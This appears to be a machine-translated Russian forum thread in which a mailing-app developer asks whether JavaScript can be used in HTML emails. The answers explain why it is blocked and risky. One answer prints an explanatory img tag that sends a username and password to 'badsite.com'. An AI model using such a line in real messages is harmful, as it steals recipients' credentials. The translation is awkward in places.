Это в основном риторический вопрос, насколько я проверял ответ: "Даже не беспокойтесь", но я хотел быть уверенным.
У нас есть приложение электронной почты, в котором вы можете отправлять электронную почту в списки подписчиков. Это не спам: он использовал, например, университет для отправки сообщений своим ученикам, музеем для отправки электронных писем подписчикам и т.д.
Недавно меня спросил потенциальный клиент, можно ли отправлять html-сообщения, содержащие javascript, не помеченные как спам.
Не зная, я сделал короткую поездку в Интернете, а то, что у меня есть (проценты из моего заднего), половина клиентов не будет отображаться должным образом, "половина клиентов будет отмечать вас как спам" и "половина клиентов полностью заблокирует javascript" (там явно есть суперпозиция).
Таким образом, лучшим решением является добавление ссылки на нужную страницу, если это действительно необходимо. У вас есть другой опыт? Вы знаете какое-либо решение для слияния электронной почты, которое предоставляет эту функцию? Знаете ли вы, согласны ли его с конкретными клиентами или отказываются отображать html с помощью javascript?
Вы указали правильные аргументы в отношении использования JavaScript в сообщениях электронной почты. Это показывает вам, что это плохая идея. Связывание со страницей, где вы можете свободно использовать javascript, является хорошим вариантом и позволяет пользователю решить, будет ли и когда он хочет получить доступ к этому "расширенному" контенту.
Проблема JavaScript заключается в том, что он представляет угрозу безопасности. Если есть какой-либо почтовый клиент, который его принимает, то это скорее всего уязвимость безопасности и должна быть исправлена.
Итак, действительно, "даже не беспокойтесь", потому что, даже если он будет работать, он скоро перестанет работать.
EDIT: Некоторые люди, похоже, не понимают, почему это угроза безопасности, поэтому я объясню.
Рассмотрим следующий код (один из нескольких способов кражи паролей с использованием Javascript и небезопасных почтовых клиентов).
Использование JavaScript:
<img src="badsite.com/senddata?username=user&password=pass">.Обычно просто создание формы с использованием JavaScript на вашем собственном небезопасном веб-сайте не является вредным само по себе, потому что браузер достаточно умен, чтобы сообщать данные gmail только gmail (и вы обычно не пытаетесь украсть пароли со своего собственного веб-сайта, и в этом случае было бы проще использовать их, чтобы украсть их).
Однако, если вы разрешили JavaScript в письмах, браузер не сможет отделить законный JavaScript от небезопасного кода.
Кража файлов cookie также возможна, если почтовый клиент не может фильтровать JavaScript.
Когда спам будет такой большой сделкой, я буду придерживаться отправки основных электронных писем, которые легко расходуются. Вы всегда можете ссылаться на веб-страницу, на которой есть ваш javascript. Вы также можете отправить параметр querystring в URL-адрес, чтобы отслеживать пользователей, которые больше всего интересуются вашими электронными сообщениями, потому что это скажет вам, что они нажимают на них. Поэтому, хотя это возможно, его, вероятно, лучше всего избежать.
Да, это возможно, но не рекомендуется. для обеспечения безопасности, прежде всего, программное обеспечение для управления почтой блокирует js или дает предупреждение, если он включает js. если пользователь является строгим для спама, то эта почта также отправляется на спам.
Это уязвимость в браузерах, если электронная почта связана с клиентом, у которого есть ваше имя пользователя и пароль, кешированные... Обычно письма открываются в браузерах...